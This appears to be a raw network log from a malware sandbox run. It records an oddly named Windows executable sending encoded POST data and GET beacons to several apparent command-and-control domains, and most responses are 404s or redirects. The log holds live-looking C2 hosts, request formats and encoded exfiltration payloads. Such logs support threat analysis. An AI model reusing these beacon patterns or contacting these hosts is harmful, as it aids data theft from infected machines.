                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /7m8b/ was not found on this server.</p></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                17 | 192.168.2.7 | 49721 | 162.0.238.246 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:38:09.988609076 CEST | 737 | OUT | POST /r48b/ HTTP/1.1
                                Host: www.mistsui.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.mistsui.top
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.mistsui.top/r48b/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Ascii: 76=zGsSyjP3kfErkYhzcDpwTmwoQDl3iM02NCynSk5zenaNTbDJae3j/apy5xsIHDLy7NAGxu8PX1muQ8mAETu7p3nutARjSLQH3cdVSE0+wq399GhTLEKCl+JOSSEjM8Kt3Ppd5wwMftHq5g9YlaZVv3TPV6ma8zVnXCJE83ew4YtTuFMDSlWMyHw/R36iN4ZV+v0mpOIa/GVnP7pbwA==
                                Sep 23, 2024 14:38:10.578469992 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                Date: Mon, 23 Sep 2024 12:38:10 GMT
                                Server: Apache
                                X-Frame-Options: SAMEORIGIN
                                Content-Length: 389
                                X-XSS-Protection: 1; mode=block
                                Connection: close
                                Content-Type: text/html
                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                18 | 192.168.2.7 | 49722 | 162.0.238.246 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:38:12.534504890 CEST | 757 | OUT | POST /r48b/ HTTP/1.1
                                Host: www.mistsui.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.mistsui.top
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.mistsui.top/r48b/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Ascii: 76=zGsSyjP3kfEr1IRzdgxwH2wrejl3os06NCunSmVjdV+NK6zJbbDjsqpysBs3KjLD7NMkxvAPX1CuQ9WAEgGkrnnglgRhN7QH3cdVSHIYwsf993RTLlKBveJNCiEjI8Lq3Ppv5x82fu/q5lZYlo9S0HTJIqn9/gwfOyhtwW2Ex61lrzRhIHagsWIEV1eUaeEg8uw+ks87gxwNCpIfmytY5PExyxTP6rCbtbdhAw8=
                                Sep 23, 2024 14:38:13.137239933 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                Date: Mon, 23 Sep 2024 12:38:13 GMT
                                Server: Apache
                                X-Frame-Options: SAMEORIGIN
                                Content-Length: 389
                                X-XSS-Protection: 1; mode=block
                                Connection: close
                                Content-Type: text/html
                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                19 | 192.168.2.7 | 49723 | 162.0.238.246 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:38:15.120706081 CEST | 1770 | OUT | POST /r48b/ HTTP/1.1
                                Host: www.mistsui.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.mistsui.top
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.mistsui.top/r48b/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:38:15.731651068 CEST | 595 | IN | HTTP/1.1 404 Not Found
                                Date: Mon, 23 Sep 2024 12:38:15 GMT
                                Server: Apache
                                X-Frame-Options: SAMEORIGIN
                                Content-Length: 389
                                X-XSS-Protection: 1; mode=block
                                Connection: close
                                Content-Type: text/html
                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                20 | 192.168.2.7 | 49724 | 162.0.238.246 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:38:17.654906988 CEST | 476 | OUT | GET /r48b/?76=+EEyxXn2ifp2lL4tSgcDej4IKTVVubAXRia9ZGYNaFbCIrCUSrCroJ1ltkc3MgDLuvAkyd1hc3+ySf3CEzuTuCrdjxUcb6kt1JtpL21e+JT78DJZMGSekOhJaCk+Ht+qyblm0D0jZ5Dr&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.mistsui.top
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:38:18.235691071 CEST | 610 | IN | HTTP/1.1 404 Not Found
                                Date: Mon, 23 Sep 2024 12:38:18 GMT
                                Server: Apache
                                X-Frame-Options: SAMEORIGIN
                                Content-Length: 389
                                X-XSS-Protection: 1; mode=block
                                Connection: close
                                Content-Type: text/html; charset=utf-8
                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                21 | 192.168.2.7 | 49725 | 198.50.252.64 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:38:24.603214025 CEST | 752 | OUT | POST /s5b1/ HTTP/1.1
                                Host: www.solisbysobha.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.solisbysobha.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.solisbysobha.net/s5b1/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Ascii: 76=VdcTaBLdkitTmACiEh11OtEF9Kxp/CXzTKjx1WOQVh2/SpHKsQuboEV6FTki2dRFquxBiyP4xjiH5TPxtK8c7MhOpWm2XKYYhbbUTy/cfqs+/jptAmdRmmdcADIiwmm69nTq3R+mrgfyl7yXhgjLyMt9yHLetz+NMPiM1CWT/0+aAs5VUfk33+pl0d3Bfh89XmCmoTQ3uhTqtj35yQ==


                                Session ID: 22  Source IP: 192.168.2.7  Source Port: 49726  Destination IP: 198.50.252.64  Destination Port: 80  PID: 3040  Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:38:27.142273903 CEST  Bytes transferred: 772  Direction: OUT
                                Data: POST /s5b1/ HTTP/1.1
                                Host: www.solisbysobha.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.solisbysobha.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.solisbysobha.net/s5b1/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 56 64 63 54 61 42 4c 64 6b 69 74 54 6e 67 79 69 46 47 70 31 66 64 45 43 78 71 78 70 31 69 58 33 54 4b 2f 78 31 53 33 64 55 53 53 2f 52 49 33 4b 74 55 43 62 76 45 56 36 64 44 6b 6a 72 74 52 65 71 75 38 30 69 32 48 34 78 69 47 48 35 57 7a 78 73 39 6f 62 34 38 68 51 77 47 6d 30 61 71 59 59 68 62 62 55 54 32 75 35 66 71 45 2b 2b 54 5a 74 41 43 4a 51 75 47 64 66 42 44 49 69 30 6d 6e 53 39 6e 54 49 33 55 65 66 72 69 33 79 6c 2f 2b 58 6d 7a 37 49 70 63 74 33 32 48 4b 35 71 6a 4c 31 47 2b 36 70 76 52 53 52 34 30 36 6a 46 61 6b 33 4f 39 6f 62 70 76 52 65 77 66 54 33 49 48 68 49 56 6e 47 2b 6c 78 6b 57 78 57 32 41 67 78 57 39 6b 74 4f 51 50 2b 55 51 6f 53 42 67 4c 59 69 52 54 44 45 36 33 66 55 3d
                                Data Ascii: 76=VdcTaBLdkitTngyiFGp1fdECxqxp1iX3TK/x1S3dUSS/RI3KtUCbvEV6dDkjrtRequ80i2H4xiGH5Wzxs9ob48hQwGm0aqYYhbbUT2u5fqE++TZtACJQuGdfBDIi0mnS9nTI3Uefri3yl/+Xmz7Ipct32HK5qjL1G+6pvRSR406jFak3O9obpvRewfT3IHhIVnG+lxkWxW2AgxW9ktOQP+UQoSBgLYiRTDE63fU=


                                Session ID: 23  Source IP: 192.168.2.7  Source Port: 49727  Destination IP: 198.50.252.64  Destination Port: 80  PID: 3040  Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:38:29.694057941 CEST  Bytes transferred: 1785  Direction: OUT
                                Data: POST /s5b1/ HTTP/1.1
                                Host: www.solisbysobha.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.solisbysobha.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.solisbysobha.net/s5b1/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 56 64 63 54 61 42 4c 64 6b 69 74 54 6e 67 79 69 46 47 70 31 66 64 45 43 78 71 78 70 31 69 58 33 54 4b 2f 78 31 53 33 64 55 53 61 2f 52 36 2f 4b 69 54 57 62 75 45 56 36 44 54 6b 6d 72 74 51 47 71 75 31 38 69 32 44 4f 78 67 4f 48 35 77 48 78 72 4d 6f 62 6a 4d 68 51 74 57 6d 31 58 4b 59 42 68 62 71 66 54 79 4b 35 66 71 45 2b 2b 52 42 74 58 47 64 51 6f 47 64 63 41 44 49 6d 77 6d 6d 2f 39 68 37 69 33 55 53 51 71 54 58 79 6c 62 53 58 6a 42 6a 49 30 4d 74 78 7a 48 4b 68 71 6a 58 71 47 36 61 54 76 53 4f 33 34 7a 4f 6a 46 74 68 31 64 38 59 41 39 64 63 43 78 2b 57 53 4a 32 56 44 4e 58 65 4b 76 32 30 74 73 56 43 6e 75 7a 79 6f 6e 70 76 4c 54 73 67 36 6e 69 31 67 62 2b 47 66 41 68 41 41 76 2f 51 77 76 2b 75 62 6c 50 73 47 34 54 6f 51 61 48 4b 62 76 73 54 71 5a 38 6e 4f 70 56 6a 6f 76 44 4c 66 50 32 4e 52 31 79 50 62 61 47 63 55 35 52 75 7a 72 64 39 6c 64 4d 41 68 6d 2b 4d 75 31 6a 61 5a 4e 42 69 4b 48 59 2b 61 6a 6b 56 6c 4d 73 39 71 61 36 6f 72 39 41 70 72 6e 39 44 62 4f 69 46 4a 76 46 63 72 35 30 6f [TRUNCATED]
                                Data Ascii: 76=[TRUNCATED]


                                Session ID: 24  Source IP: 192.168.2.7  Source Port: 49728  Destination IP: 198.50.252.64  Destination Port: 80  PID: 3040  Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:38:32.234188080 CEST  Bytes transferred: 481  Direction: OUT
                                Data: GET /s5b1/?mtJD_=fvdlJ2L&76=Yf0zZ3jBoCdhuzLDLj91Ws8HprJqzGXqNpWi9hWRQAr/e4SYtEvUr1BCdCQtsdxZ1OdzkDb6zzma4zXRjMwopMxEpmqXXuUrncqDeB64G5UYzEp6MWYeviVvJyEh+kzS7xrr7DyksnLe HTTP/1.1
                                Host: www.solisbysobha.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11


                                Session ID: 25  Source IP: 192.168.2.7  Source Port: 49729  Destination IP: 85.159.66.93  Destination Port: 80  PID: 3040  Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:38:37.842024088 CEST  Bytes transferred: 764  Direction: OUT
                                Data: POST /hel6/ HTTP/1.1
                                Host: www.sppsuperplast.online
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.sppsuperplast.online
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.sppsuperplast.online/hel6/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 6c 37 72 53 75 39 36 41 6a 4b 6d 33 73 7a 35 55 62 54 5a 34 53 34 30 6e 50 73 7a 73 36 6f 65 73 72 45 77 39 68 67 64 48 67 73 56 70 4c 72 34 74 4a 6f 61 56 66 4a 78 78 51 75 74 71 75 35 51 63 58 2f 4f 71 73 50 54 4c 30 34 67 6d 51 72 59 33 44 65 65 37 7a 4c 41 6f 30 54 77 38 68 2f 79 4f 49 65 68 48 6a 52 39 4a 6b 71 49 76 30 76 6a 4d 38 7a 71 2b 6a 62 70 35 64 47 70 56 71 34 6c 49 78 6d 55 51 77 4a 32 42 45 2b 30 31 58 34 57 7a 53 52 73 52 72 7a 52 75 6f 46 48 65 73 64 4d 36 4c 45 4c 45 42 7a 6a 4d 59 38 71 78 30 5a 75 41 62 6d 4d 41 77 48 65 2f 68 59 38 4c 65 4d 44 41 4d 54 35 4b 78 75 78 72 52 2f 43 73 48 67 4c 69 35 51 3d 3d
                                Data Ascii: 76=l7rSu96AjKm3sz5UbTZ4S40nPszs6oesrEw9hgdHgsVpLr4tJoaVfJxxQutqu5QcX/OqsPTL04gmQrY3Dee7zLAo0Tw8h/yOIehHjR9JkqIv0vjM8zq+jbp5dGpVq4lIxmUQwJ2BE+01X4WzSRsRrzRuoFHesdM6LELEBzjMY8qx0ZuAbmMAwHe/hY8LeMDAMT5KxuxrR/CsHgLi5Q==


                                Session ID: 26  Source IP: 192.168.2.7  Source Port: 49730  Destination IP: 85.159.66.93  Destination Port: 80  PID: 3040  Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:38:40.958497047 CEST  Bytes transferred: 784  Direction: OUT
                                Data: POST /hel6/ HTTP/1.1
                                Host: www.sppsuperplast.online
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.sppsuperplast.online
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.sppsuperplast.online/hel6/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 6c 37 72 53 75 39 36 41 6a 4b 6d 33 74 51 52 55 63 79 5a 34 44 49 30 6b 41 4d 7a 73 6a 59 65 67 72 45 30 39 68 6a 51 41 67 66 78 70 4c 50 77 74 49 70 61 56 59 4a 78 78 62 4f 74 72 71 35 51 43 58 34 47 49 73 4f 76 4c 30 38 77 6d 51 71 6f 33 44 70 69 34 7a 62 41 51 2f 7a 77 36 38 50 79 4f 49 65 68 48 6a 52 70 77 6b 71 51 76 30 2f 7a 4d 39 58 65 35 71 37 70 36 55 6d 70 56 75 34 6c 45 78 6d 56 67 77 49 72 57 45 38 63 31 58 35 6d 7a 53 6b 4d 57 6b 7a 52 6f 31 56 48 49 6b 59 74 69 54 46 7a 4c 5a 43 50 59 66 37 7a 4c 34 50 7a 69 42 45 41 73 75 57 6d 45 6c 61 59 39 4a 71 65 31 4f 53 39 53 38 4d 46 4b 4f 49 6e 47 4b 79 71 6d 76 71 6c 57 50 33 58 72 43 75 5a 46 4a 4f 46 2f 77 33 70 38 32 6f 41 3d
                                Data Ascii: 76=l7rSu96AjKm3tQRUcyZ4DI0kAMzsjYegrE09hjQAgfxpLPwtIpaVYJxxbOtrq5QCX4GIsOvL08wmQqo3Dpi4zbAQ/zw68PyOIehHjRpwkqQv0/zM9Xe5q7p6UmpVu4lExmVgwIrWE8c1X5mzSkMWkzRo1VHIkYtiTFzLZCPYf7zL4PziBEAsuWmElaY9Jqe1OS9S8MFKOInGKyqmvqlWP3XrCuZFJOF/w3p82oA=


                                Session ID: 27  Source IP: 192.168.2.7  Source Port: 49731  Destination IP: 85.159.66.93  Destination Port: 80  PID: 3040  Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:38:43.504518032 CEST  Bytes transferred: 1797  Direction: OUT
                                Data: POST /hel6/ HTTP/1.1
                                Host: www.sppsuperplast.online
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.sppsuperplast.online
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.sppsuperplast.online/hel6/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 6c 37 72 53 75 39 36 41 6a 4b 6d 33 74 51 52 55 63 79 5a 34 44 49 30 6b 41 4d 7a 73 6a 59 65 67 72 45 30 39 68 6a 51 41 67 66 35 70 4c 64 6f 74 49 4f 32 56 5a 4a 78 78 48 2b 74 6d 71 35 52 65 58 2b 75 4d 73 4f 6a 62 30 36 73 6d 57 4d 63 33 46 59 69 34 39 62 41 51 77 54 77 37 68 2f 79 68 49 65 78 44 6a 52 35 77 6b 71 51 76 30 39 37 4d 37 44 71 35 73 37 70 35 64 47 6f 48 71 34 6b 52 78 6d 63 59 77 4a 65 72 45 4e 38 31 55 5a 32 7a 42 33 6b 57 37 44 52 71 32 56 47 4c 6b 59 70 44 54 46 75 36 5a 43 37 79 66 38 58 4c 38 71 47 37 53 31 49 51 76 56 4f 65 6d 35 45 4d 4f 35 36 49 4a 44 5a 45 2b 74 78 59 49 49 61 35 4f 42 4f 36 72 50 4e 51 54 6c 66 6c 44 64 52 41 4b 75 6f 64 73 32 4a 33 67 4e 76 37 58 55 39 4e 47 46 2f 7a 64 46 4d 6b 42 57 49 4c 6f 48 65 44 2f 4d 5a 41 4b 6c 69 6e 55 4a 6f 32 59 56 79 32 4d 37 41 50 47 30 56 6c 30 45 51 36 2b 6d 45 35 2f 52 6b 6f 4f 78 33 6a 7a 46 30 38 73 6b 73 32 31 47 55 58 70 44 6e 2f 33 4e 73 67 63 70 45 67 41 37 58 74 79 47 6d 78 59 42 4f 50 4f 62 47 66 4e 69 5a [TRUNCATED]
                                Data Ascii: 76=[TRUNCATED]


                                Session ID: 28  Source IP: 192.168.2.7  Source Port: 49732  Destination IP: 85.159.66.93  Destination Port: 80  PID: 3040  Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:38:46.046056986 CEST  Bytes transferred: 485  Direction: OUT
                                Data: GET /hel6/?76=o5DytMykkaK7sxNXVTYwbJ0nas7Lrf6+xSFmwBlJgutuTdBVL+3Ld5pnGP5bgJpbKreJsN3lh4gHWJ53LIGu8bA2yj0UpLyBdZ5DgjAe+Y8tl6D74j+Er65lZkEVlLJH6zUxwY6EHphi&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.sppsuperplast.online
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Timestamp: Sep 23, 2024 14:38:46.718200922 CEST  Bytes transferred: 225  Direction: IN
                                Data: HTTP/1.1 404 Not Found
                                Server: nginx/1.14.1
                                Date: Mon, 23 Sep 2024 12:38:46 GMT
                                Content-Length: 0
                                Connection: close
                                X-Rate-Limit-Limit: 5s
                                X-Rate-Limit-Remaining: 19
                                X-Rate-Limit-Reset: 2024-09-23T12:38:51.6173239Z


                                Session ID: 29  Source IP: 192.168.2.7  Source Port: 49733  Destination IP: 142.250.186.51  Destination Port: 80  PID: 3040  Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:38:51.937959909 CEST  Bytes transferred: 740  Direction: OUT
                                Data: POST /i06p/ HTTP/1.1
                                Host: www.deefbank.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.deefbank.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.deefbank.net/i06p/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 59 72 49 62 67 36 6f 67 4d 4e 4d 63 59 65 6f 52 46 55 4e 75 6c 67 49 66 52 34 37 4d 42 36 4f 61 41 34 67 4f 48 77 71 72 65 71 7a 6b 4c 61 7a 38 38 69 65 70 72 66 5a 63 73 42 6d 77 4b 54 32 50 62 2b 55 51 6e 49 42 2f 6f 77 71 5a 74 72 63 69 2f 42 78 2f 55 4a 6e 38 47 59 48 6c 6a 59 72 72 6a 4c 61 79 78 6a 31 71 73 58 77 6a 59 75 39 56 68 59 76 47 43 74 61 73 45 50 37 69 38 37 67 43 2b 42 47 47 63 6f 6c 4e 68 6c 34 51 79 65 7a 65 61 34 63 53 68 6c 51 58 76 61 75 2b 76 79 50 77 53 59 6c 36 70 65 5a 6f 6c 64 77 2f 55 73 63 77 4b 6a 2b 68 6b 30 57 71 55 2f 62 54 2b 74 4a 39 4e 4a 79 69 44 67 36 4a 4e 37 61 52 36 6e 52 73 53 77 3d 3d
                                Data Ascii: 76=YrIbg6ogMNMcYeoRFUNulgIfR47MB6OaA4gOHwqreqzkLaz88ieprfZcsBmwKT2Pb+UQnIB/owqZtrci/Bx/UJn8GYHljYrrjLayxj1qsXwjYu9VhYvGCtasEP7i87gC+BGGcolNhl4Qyezea4cShlQXvau+vyPwSYl6peZoldw/UscwKj+hk0WqU/bT+tJ9NJyiDg6JN7aR6nRsSw==
                                Timestamp: Sep 23, 2024 14:38:52.646972895 CEST  Bytes transferred: 402  Direction: IN
                                Data: HTTP/1.1 301 Moved Permanently
                                Content-Type: application/binary
                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                Pragma: no-cache
                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                Date: Mon, 23 Sep 2024 12:38:52 GMT
                                Location: https://www.deefbank.net/i06p/
                                Server: ESF
                                Content-Length: 0
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Connection: close


                                Session ID: 30  Source IP: 192.168.2.7  Source Port: 49734  Destination IP: 142.250.186.51  Destination Port: 80  PID: 3040  Process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp: Sep 23, 2024 14:38:54.494962931 CEST  Bytes transferred: 760  Direction: OUT
                                Data: POST /i06p/ HTTP/1.1
                                Host: www.deefbank.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.deefbank.net
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.deefbank.net/i06p/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
